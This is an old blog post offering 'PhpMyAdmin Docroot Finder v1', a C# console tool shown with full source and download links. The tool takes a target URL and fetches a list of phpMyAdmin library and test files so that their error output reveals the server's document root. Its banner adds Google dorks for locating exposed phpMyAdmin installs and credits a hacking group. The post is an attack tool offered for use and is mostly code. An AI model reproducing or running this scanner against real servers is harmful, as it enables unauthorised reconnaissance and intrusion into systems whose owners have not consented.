Posted by Security is just an illusion at Friday, March 29, 2013
Read our previous post
Just find some old tool from me,if anybody need it Have pfun
PhpMyAdmin Docroot Finder v1 simple search for vuln phpmyadmin php files and give you the doc root if phpmyadmin vuln.
Download :
PhpMyAdmin Docroot Finder v1.rar (4 KB)
or http://www.mirrorupload.net/file/AFULMCDC/#!PhpMyAdmin+Docroot+Finder+v1.rar
Source :
using System;
using System.Collections.Generic;
using System.Net;
using System.IO;
using System.Text;
namespace ConsoleApplication1
{
class Program
{
static void Main(string[] args)
{
Console.Write("---------------------------------------------------------------|\n");
Console.Write("---------------------------------------------------------------|\n");
Console.Write(" \n");
Console.Write(" ! \n");
Console.Write(" (-.-) \n");
Console.Write(" --------------------oOO---(_)---OOo----------------------| \n");
Console.Write(" | PhpMyAdmin Docroot Finder v1 by cr4shyyy | \n");
Console.Write(" ---------------------------------------------------------| \n");
Console.Write(" \n");
Console.Write(" \n");
Console.Write("---------------------------------------------------------------|\n");
Console.Write("---------------------------------------------------------------|\n");
Console.Write("[!] Discovered: cr4shhyyy form German Cyber Elite Army\n");
Console.Write("[!] Site: http://g0t-r00t.gov\n");
Console.Write("[!] Download: http://sourceforge.net/projects/phpmyadmin/files/ \n");
Console.Write("[!] Version: 1.0 \n");
Console.Write("[!] Date: 23.11.2012\n");
Console.Write("[!] Remote: yes\n");
Console.Write("[!] Google Dork: allinurl:index.php?db=information_schema\n");
Console.Write("[!] Google Dork: phpMyAdmin - 2.8.1 index of\n");
Console.Write("[!] Tested: Windows 7 x64\n");
Console.Write("------------------------------------------------------------\n");
string str;
Console.WriteLine("Enter some Target:");
str = Console.ReadLine();
Console.WriteLine("Taget and Fire ...: " + str);
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/db_table_exists.lib.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
//start_get();
}
catch
{
}
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
//start_get();
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/bookmark.lib.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/check_user_privileges.lib.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/common.inc.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/database_interface.lib.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/db_info.inc.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/db_links.inc.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/display_change_password.lib.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "libraries/display_create_database.lib.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "test/AllTests.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "test/Environment_test.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "test/FailTest.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "test/PMA_STR_sub_test.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "test/PMA_escapeJsString_test.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
try
{
//Our getVars, to test the get of our php.
//We can get a page without any of these vars too though.
string getVars = "test/PMA_get_real_size_test.php";
//Initialization, we use localhost, change if applicable
HttpWebRequest WebReq = (HttpWebRequest)WebRequest.Create
(string.Format(str + "{0}", getVars));
//This time, our method is GET.
WebReq.Method = "GET";
//From here on, it's all the same as above.
HttpWebResponse WebResp = (HttpWebResponse)WebReq.GetResponse();
//Let's show some information about the response
//Console.WriteLine(WebResp.StatusCode);
//Console.WriteLine(WebResp.Server);
//Now, we read the response (the string), and output it.
Stream Answer = WebResp.GetResponseStream();
StreamReader _Answer = new StreamReader(Answer);
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
Console.WriteLine(_Answer.ReadToEnd());
Console.WriteLine("--------------------------------------------------------------------------------------------------------");
//Congratulations, with these two functions in basic form, you just learned
//the two basic forms of web surfing
//This proves how easy it can be.
}
catch
{
// Error: Use of unassigned local variable '404 Not Found'.
Console.Write("404 Not Found !!!\n");
}
}
private static void start_get()
{
}
}
}
No comments:
Post a Comment